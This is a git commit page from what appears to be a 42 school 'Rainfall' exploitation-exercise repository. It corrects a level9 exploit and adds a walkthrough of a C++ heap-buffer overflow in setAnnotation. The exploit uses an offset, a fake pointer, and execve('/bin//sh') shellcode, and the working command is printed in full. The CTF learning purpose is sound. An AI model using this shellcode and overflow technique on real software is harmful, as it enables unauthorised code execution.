starnakin/42_rainfall
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

level9: walkthrough done and typo fix in the exploit

Browse Source
This commit is contained in:
0x35c 2025-05-06 20:47:10 +02:00
parent 428102a376
commit 31decad298
2 changed files with 23 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
level9/ressources/exploit
View File

@ -1 +1 @@
./level9 $(python -c 'print "\x11\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')
./level9 $(python -c 'print "\x10\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')

22
level9/walkthrough Normal file
View File

@ -0,0 +1,22 @@
# Level9
Using BinaryNinja, we can decompile the code and see that it's from a cpp source code.
It has a class named `N`, containing:
- 2 attributes `char annotation[100]` and `int nb`
- a constructor setting `int nb`
- the method `setAnnotation()`, doing a `memcpy()` of a string into `annotation`
- 2 operator overloads (`+` and `-`).
The main allocates 2 instances (`a` and `b`) of this class. It will store their addresses in 2 other pointers.
We have a non-secure call to `setAnnotation()` on `a` with `av[1]`, allowing us to overflow the annotation buffer.
Using (this tool)[https://wiremask.eu/tools/buffer-overflow-pattern-generator/] we can find the offset between `n1` and `eax`, resulting in 108.
Now what we want to do is copy the address of our buffer in `eax`, which will then be moved to `edx` and eventually called (`call *%edx` at the end of the program).
Let's build our exploit in 4 parts:
- `"\x10\xa0\x04\x08"` => the address of the shell code injection which is `n1->annotation + 4` since we need to dereference it twice
- `"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"` => the 25 bytes shell code injection
- `"A"*79` => the remaining bytes to overflow until `eax` (4+25+79 = 108)
- `"\x0c\xa0\x04\x08"` => the adress of the actual buffer in `n1->annotation`.
Here is the command:
`./level9 $(python -c 'print "\x10\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')
`